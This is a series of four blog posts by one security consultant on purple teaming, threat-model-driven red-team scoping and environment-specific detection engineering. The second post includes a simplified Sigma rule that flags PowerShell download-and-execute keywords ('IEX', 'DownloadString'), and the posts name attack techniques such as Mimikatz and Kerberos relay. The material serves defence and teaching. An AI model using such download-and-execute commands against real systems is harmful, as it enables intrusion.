Purple Teaming Threat Modelling

Your Purple Team Test Failed Because Your Threat Model Is Wrong

Hugh McGauran March 20, 2026 6 min read

You ran a purple team exercise last week. Your red team executed a flawless attack chain: initial access via phishing, lateral movement via Kerberos relay, privilege escalation, and data exfiltration. Picture perfect.

Then you got the debrief: your EDR caught nothing. Your SIEM was silent. Your firewalls didn't alert. Your detection engineers looked at you and said, "Our tools are misconfigured."

They're wrong. And you probably are too.

The problem isn't your tools. It's that your red team tested an adversary that doesn't exist in your environment.

The Fundamental Mismatch

Here's what I see happen in most purple team programmes:

Red team is given a playbook. Usually MITRE ATT&CK or some vendor-blessed "attack pattern." Test everything: initial access, lateral movement, persistence, exfil. Be creative.
Blue team sits and watches. They monitor alerts. When nothing fires, they assume detection is broken. They tune. They add rules. They adjust thresholds.
Repeat. Next quarter, red team runs the same tests. Still nothing fires (or things fire randomly, drowning in false positives). Conclusion: "We need better tooling."

Here's what's actually happening: You're testing threat capabilities your environment doesn't support.

An Example

Let's say you're a mid-sized financial services firm. Your threat model is: targeted APTs (FIN7, Lazarus), occasional script kiddies, insider threats.

Your environment: Windows 10/11 workstations, hardened build. Modern domain controllers with Kerberos hardening. Network segmentation: finance backend on isolated VLAN. EDR deployed globally. No plaintext credentials stored on endpoints. Conditional Access enforces MFA.

Your red team shows up and runs Mimikatz, tries Kerberos relay attacks, attempts lateral movement across network segments, and exfiltrates via unencrypted channels.

Result: EDR blocks the binaries. Lateral movement fails (segmentation). Nothing detectable because nothing succeeds.

Your blue team concludes: "EDR is misconfigured. We need better visibility into Kerberos traffic."

Wrong. Those attacks don't fit your threat model. An actual FIN7 intrusion into your environment would:

Use living-off-the-land techniques (no Mimikatz)
Move laterally via legitimate admin tools (RDP, WinRM) already allowed in your firewall rules
Steal credentials from memory over time, not via flashy in-memory attacks
Exfil via HTTP/HTTPS, not SMB or DNS tunneling

So your EDR should miss those attacks, because they're not your risk. Your tools are configured for your actual adversary, not the MITRE ATT&CK checklist.

The Real Cost of Environment-Agnostic Testing

When you run tests that don't align with your threat model:

You get false confidence. Red team "successfully" executes techniques. You feel like you're being tested thoroughly. You're not.
You waste blue team time. Detection engineers spend weeks building rules for attacks that will never happen to you.
You create alert fatigue. All those rules for non-existent threats? They generate false positives. Your SOC tunes them down or disables them. Then an actual threat uses a legitimate technique you didn't monitor.
You fund vendor marketing. Tool vendors love environment-agnostic testing. It justifies upgrading to the newest EDR feature. None of which you needed if your testing was threat-model-driven.

What Actually Works

Stop testing "everything." Start testing what you're actually at risk from.

Step 1: Define your threat model. Ask yourself: Who targets companies like mine? What are they after? What access do they typically start with? What's their environment awareness? Write this down. Three paragraphs, maximum.

Step 2: Map your environment against that threat. What attack paths does your threat model realistically have access to? What techniques are actually possible? What detection gaps exist on those paths?

Step 3: Test only the relevant paths. Your red team doesn't run the MITRE ATT&CK playbook. They run your threat playbook.

If FIN7 uses spear-phishing and living-off-the-land lateral movement, test that. If they exfil via HTTPS, test that — and tune your detection to spot anomalous HTTPS traffic from workstations. If they're blocked by your segmentation, celebrate the segmentation and move to the next gap.

The Honest Conversation

"Your tools are configured correctly for the threats you actually face. When red team tests succeed using techniques that wouldn't work in a real intrusion, that's not a detection failure — that's a sign your test wasn't threat-driven. Let's refocus on the adversaries who can actually hurt us."

This conversation is uncomfortable because it implies your purple team programme might be theatre. But it's the one that matters.

What's Next

For your next purple team exercise:

Spend time defining threat model, not technique selection
Have blue team validate which attack paths are realistic in your environment
Red team tests those paths, trying to evade detection on actual adversary techniques
Blue team tunes for those specific gaps

The tests will be less flashy. You won't check every MITRE ATT&CK technique. But when red team succeeds, it means something: you've found a real gap against a real threat. That's worth a lot more than catching Mimikatz on a hardened system that would never run it in the first place.

Next: How to actually scope a red team exercise to your threat model. Plus: Real detection gaps found in a financial services engagement.

← All posts

Detection Engineering Blue Team

Detection Engineering in a Real Environment: Why Generic Rules Fail

Hugh McGauran March 27, 2026 7 min read

I walked into a SOC last month where they'd deployed 847 Sigma rules.

Eight hundred and forty-seven.

The detection engineers were proud. They'd built a comprehensive ruleset covering the entire MITRE ATT&CK framework. Every technique had detection logic. Nothing would slip through, they said.

The SOC was drowning. Sixty percent of alerts were false positives. They'd stopped tuning months ago and just turned off entire rule categories. The analysts were burnt out, clicking "snooze" on everything.

Here's what nobody told them: Generic detection rules fail in real environments because real environments aren't generic.

The Rule That Doesn't Work

Let's look at a real example. This is a common Sigma rule (simplified):

title: Suspicious PowerShell Execution
detection:
  selection:
    EventID: 4688
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  condition: selection

This rule fires when PowerShell runs with suspicious keywords. Seems solid. Catches code injection, right?

Now let's deploy it in a real environment:

Your software deployment tool (SCCM, Ansible) runs PowerShell scripts with DownloadString. Alert every 30 seconds. Disable the rule.
Your backup vendor runs scheduled PowerShell jobs that invoke expressions. Thousands of alerts per day. Tune it out.
Your developers have scripts with "IEX" in comments. Execution fires on comment lines. Noise.
Your EDR has whitelisting for Microsoft-signed PowerShell; your SIEM doesn't. It alerts on things EDR already allowed.

By week two, detection engineers have disabled half the rule. By month one, it's gone. And when an attacker actually uses PowerShell injection, it's not being monitored because the rule was too noisy to keep.

The rule didn't fail because it was poorly written. It failed because it was environment-agnostic.

Why Generic Rules Don't Survive Contact with Reality

Detection rules written in a vacuum assume: no legitimate tools use the same technique; all environments have the same baseline behaviour; detection can be tuned to pure signal; attackers use the same techniques in every environment. All false.

In a real environment:

1. Legitimate tooling is weird. Your backup software might use SMB in ways that look like lateral movement. Your monitoring agent might inject DLLs that look like persistence. Your deployment pipeline might run binaries with command-line obfuscation that looks like evasion.

2. Baselines vary wildly. A developer workstation runs PowerShell constantly. A kiosk never does. A bank branch server runs different software than your headquarters. A rule tuned for one environment is useless or too noisy in another.

3. Tuning for signal means losing sensitivity. You can build a rule that catches 100% of attacks — but it'll also alert on 10,000 false positives. There's no free lunch.

4. Attackers adapt to your environment. An attacker who knows you monitor PowerShell won't use PowerShell. They'll use legitimate admin tools, scheduled tasks, or techniques that blend into your baseline.

The Real Problem With Sigma

Sigma is excellent. Open-source, community-driven, better than nothing. But Sigma is a language, not a solution. It's like saying "I have a hammer" and expecting to build a house. You need a builder.

When people drop Sigma rules from the internet into their SIEM without context, they get either blindly tuned rules (so permissive they're useless), overly aggressive rules (so noisy they're turned off within a week), or rules that don't apply — designed for environments completely different from yours.

I've seen security teams import 1000 Sigma rules and then abandon 900 of them. That's not a detection programme; that's security theatre.

What Actually Works

Effective detection is built bottom-up, not top-down.

Start with your environment baseline. Run your legitimate tools and systems for a week. Capture: normal PowerShell execution patterns, normal network connections, normal process relationships, normal file writes. Write this down. This is your signal floor. Anything below this is noise; anything above is suspicious.

Then build detection for your actual threats. Not MITRE ATT&CK. Not Sigma. Your threats. FIN7 would use living-off-the-land techniques in your environment. Ransomware would move laterally using your admin tools.

Example: You know that administrative access to your financial database should only come from 3 specific systems, at 2 PM on Mondays (batch job), from 2 specific service accounts. Anything else? Alert immediately. No false positives because you know your baseline.

Tune for precision, not coverage. Don't try to detect every possible attack technique. Detect the ones that matter to you. Ten precise, high-fidelity rules that catch real attacks beat 1000 rules that trigger on everything.

The Role of Generic Rules

Sigma and community rules aren't useless. They're a starting point — a hypothesis library. Use them like this:

Review — Which techniques are relevant to my threat model?
Understand — What is this rule trying to catch? How does it work?
Evaluate — Would this detect an attack in my environment, or would it be lost in noise?
Adapt — Rewrite it for my baseline. Add context (system type, user, time of day). Whitelist known legitimate use cases.
Test — Run it against historical data. Does it catch what you expect? How many false positives?
Deploy — Only if it's precise enough to keep tuned for more than a month.

The Uncomfortable Truth

If your detection programme consists of rules from the internet, Sigma rules you didn't adapt, detection thresholds you didn't tune, and coverage of every MITRE ATT&CK technique — then you have a detection programme in name only.

Detection engineering is environment-specific work. It can't be outsourced to community rules or vendor defaults. It requires someone who understands your systems, your threats, and your tools. That person is on your team. Or you don't have effective detection.

What's Next

Audit your rules. How many do you actually tune and maintain? Delete the rest.
Establish your baseline. Document normal behaviour for critical systems.
Build environment-specific rules for your threat model. Don't import; adapt.
Focus on precision. Ten good rules beat 1000 mediocre rules.
Invest in the people who know your environment. That's where effective detection lives.

Next: Building a detection baseline for your critical systems. Plus: A real case where generic rules missed an entire attack.

← All posts

Red Team Purple Teaming

Why Your Red Team Tests Are Designed to Fail (And You Don't Know It)

Hugh McGauran April 3, 2026 6 min read

Red team comes in on Monday. They've got a scope, a timeline, and a list of techniques to test. By Friday, they've "successfully executed" initial access, lateral movement, persistence, and exfiltration.

Blue team reviews the engagement. They have a list of "findings." Detection missed everything. Security posture looks weak.

So you hire another consultant. You buy more tooling. You run the test again next quarter. Same results.

Here's what nobody tells you: Your red team isn't testing what you think they're testing.

The Scope Problem

Let me walk you through a real engagement. Client is a mid-market insurance company. They scope the red team exercise: "Test our security posture against advanced threats. Use realistic techniques. Show us what an attacker could do."

Red team scope: initial access (everything), lateral movement (everything on the network), persistence (any means necessary), exfiltration (any data, any method).

This sounds comprehensive. It's actually a fantasy. An attacker targeting this client doesn't have "any means necessary" access to "everything on the network." Hard segmentation blocks them. Certain accounts have additional logging. Egress is constrained.

But the red team scope doesn't acknowledge these constraints. So red team tests in a sandbox where every attack succeeds because they're not fighting the real environment — they're fighting an idealised version of it.

The Environment Problem

Red team asks: "What systems can we access?" Blue team (or the client) says: "Whatever an attacker could realistically access." This is ambiguous. So red team interprets it broadly: everything reachable on the network is fair game.

What they should have asked: "What systems can an attacker realistically access given our segmentation, credential controls, and monitoring?"

A real attacker targeting insurance data doesn't have access to the file servers in marketing, the development lab, or the HVAC management system. But if nobody explicitly excludes those from scope, red team tests them anyway. Then when red team successfully gets to the marketing server (which has no monitoring), blue team documents it as a detection failure. Really, it's a scope definition failure.

The Technique Problem

Red team gets creative. They use techniques that sound realistic but aren't actually part of any real attack chain for this environment:

Kerberos relay attacks (requires certain network conditions that don't exist here)
Memory-only persistence (requires no EDR; EDR is deployed)
Named pipe lateral movement (works in the test, but in production the pipes are monitored)
PowerShell obfuscation (detected by their logging; they just didn't run it in the test)

Red team succeeds because they're testing in isolation. They're testing: "Is this technique possible?" not "Is this technique undetectable in your environment?"

The Time Problem

Red team has unlimited time to find a path. An attacker has limited time before they're detected.

Real attack: Attacker lands, spends 30 minutes poking around, tries three things, gets blocked on the third, leaves or adapts.

Red team test: Attacker lands, tries thirty things over a week, finds one that works, uses it, succeeds. The persistence and thoroughness of a week-long engagement is not representative of the speed and detection requirements of a real intrusion.

What This Means

Your red team engagement tells you: "Over an extended period, using known techniques, with no time pressure, against systems we can freely access, we were able to move laterally and exfiltrate data."

What it doesn't tell you: "Against your actual threat model, in real time, with your actual monitoring in place, this is what would happen." Those are very different questions.

The Better Approach

Real-world red team engagements should be scoped to match reality:

Threat-model driven scope. Don't test "everything." Test what your actual adversary would target and how they'd move.
Time-limited and detection-aware. Red team doesn't have unlimited time. They have 48 hours to land, move, and exfil before they assume they're burned. Blue team knows they're in the environment and is actively hunting.
Constrained to realistic access. Red team starts from actual initial access vector, not "we've already compromised a workstation." They work with the access they actually get.
Detection evasion is the goal, not secondary. If it's immediately flagged, it fails — doesn't matter if the technique "works."
Realistic tool constraints. Red team uses tools an attacker would actually use. If they'd avoid Mimikatz because EDR would catch it, they do.

A Simple Test

Ask yourself:

Did red team use techniques because they were realistic for your threat model, or because they worked in the test?
Would your actual threat actor have access to every system red team tested?
Did red team have to evade detection, or was it just running commands and seeing what worked?
Were there time or detection constraints that matched a real attack?

If the answer to any of these is "not really," your engagement was testing techniques, not threats.

Next: How to properly scope a red team exercise. Plus: A case study where realistic constraints changed the entire engagement outcome.

← All posts

Purple Teaming Red Team Blue Team

Purple Teaming That Actually Works: A Framework for Real Collaboration

Hugh McGauran April 10, 2026 8 min read

You've got a red team and a blue team. They hate each other.

Red team thinks blue team is incompetent because they don't understand adversary tradecraft. Blue team thinks red team is reckless because they don't understand operational risk. They don't talk unless it's a quarterly "engagement."

Then someone tells you about "purple teaming" and you think: "Problem solved." It's not. Purple teaming is a methodology that requires real work. Most programmes fail because they're treated as a project (quarterly test) instead of a practice (continuous collaboration).

Here's how to actually do it.

The Failure Mode

Most purple team attempts follow this pattern:

Month 1: Announce purple team programme. Red and blue teams meet. There's optimism.

Month 2–3: Red team runs a "collaborative exercise." Blue team watches. Debrief is awkward.

Month 4: Nothing changes. Red team goes back to attacks. Blue team goes back to reactive defence.

Month 5: "Why aren't we purple teaming anymore?" Another meeting gets scheduled.

Month 6–12: Quarterly reports replace continuous collaboration. Programme becomes checkboxes.

Why does this happen? Because purple teaming requires fundamentally different thinking, and no one allocated time for that shift.

What Purple Teaming Actually Is

Purple teaming isn't red team + blue team in the same room. It's: continuous, aligned, threat-model-driven collaboration between attack and defence.

That's different from red teaming (I attack; you detect what I did), blue teaming (I defend; hope you don't break my things), penetration testing (contract engagement with findings), or security auditing (compliance check).

Purple teaming means: red team understands blue team's detection capabilities. Blue team understands attack sequences. Both teams align on what matters. Both teams iterate continuously to improve both attack and defence. Collaboration is built into operations, not scheduled quarterly.

The Framework

1. Establish Shared Threat Model (Week 1)

Red and blue teams sit together. No red team slides, no blue team slides. Just reality. Questions to answer together:

Who threatens us? (Be specific: APT groups, competitors, insiders, criminals)
What do they want? (Data, disruption, espionage, financial gain)
How do they typically access our environment?
What paths exist from initial access to objective?
How much time do they have?
What detection would burn them?

Document this. Write it down. "We believe APT28 targets financial services via spear-phishing for initial access. They move laterally within 2–4 hours. They exfil via HTTPS to infrastructure we can't block." This is not a consultant document. This is the shared foundation.

2. Map Realistic Attack Paths (Week 2–3)

Given that threat model, what are the actual attack paths? Not "everything MITRE ATT&CK says is possible." The paths your threat model actually uses.

Draw them, then blue team adds detection points at each stage. Now you have an attack sequence and a detection sequence. This is what you test. Not everything. This.

3. Red Team Operates Within Constraints (Ongoing)

Red team's job changes. They don't try to breach the environment. They try to follow the realistic threat path while evading detection.

Rules: start from your actual initial access vector; move only to systems your threat model would target; use tools and techniques your threat model would use; avoid detection — don't just run commands.

When red team succeeds: "We successfully executed the threat model while avoiding detection." When red team fails: "We were detected at the lateral movement phase." Both are valuable. Both tell blue team something real.

4. Blue Team Hunts Actively (Ongoing)

Blue team doesn't passively watch. They actively hunt for the attack. Weekly threat hunting sessions:

"Given our threat model, what would the initial access look like?"
"What can we detect in the first 30 minutes?"
"Can we spot lateral movement before they reach the objective?"

Use Atomic Red Team playbooks, but scoped to your paths. Update detection rules based on what red team teaches them about evasion.

5. Iterate (Monthly)

Once a month, red and blue teams sync: what did red team learn about evasion? What did blue team learn about detection? Did our threat model change? How did we do against a realistic attack?

Adjust next month's exercises based on findings.

The Governance

For this to work, you need time allocation: red team 20% of their week to collaborative exercises; blue team 5–10% of SOC time to active hunting; leadership time for monthly sync and iteration.

Metrics (not vanity metrics): mean time to detect for the threat model you care about; mean time to respond; techniques red team is using that blue team isn't catching; detection improvements month-over-month.

The Uncomfortable Part

This takes time. It's not shiny. It doesn't fit neatly on a security audit checklist. You can't outsource it to a quarterly consultant. You need your own people, aligned on threat model, collaborating continuously.

If you don't have budget for this, purple teaming won't work. You'll run the motions and get the theatre. But if you do this right, you get: red team that understands why they're testing what they're testing; blue team that detects threats faster; security operations that improve month-over-month; collaborative culture instead of siloed teams.

Checklist: Do You Have a Real Purple Team Programme?

Shared, documented threat model (written, agreed by red + blue + leadership)
Realistic attack paths (not "test everything," but specific sequences)
Red team constrained to threat model (not unlimited scope)
Blue team actively hunting (not passively monitoring)
Monthly sync between teams (with iteration, not just reporting)
Detection improving month-over-month (measurable)
Budget allocated (not "squeeze in around other work")

If you don't check most of these, you have a red team and a blue team. You don't have purple teaming.

Next: Building a threat model with your team. Plus: How to measure purple team ROI without vanity metrics.

Start here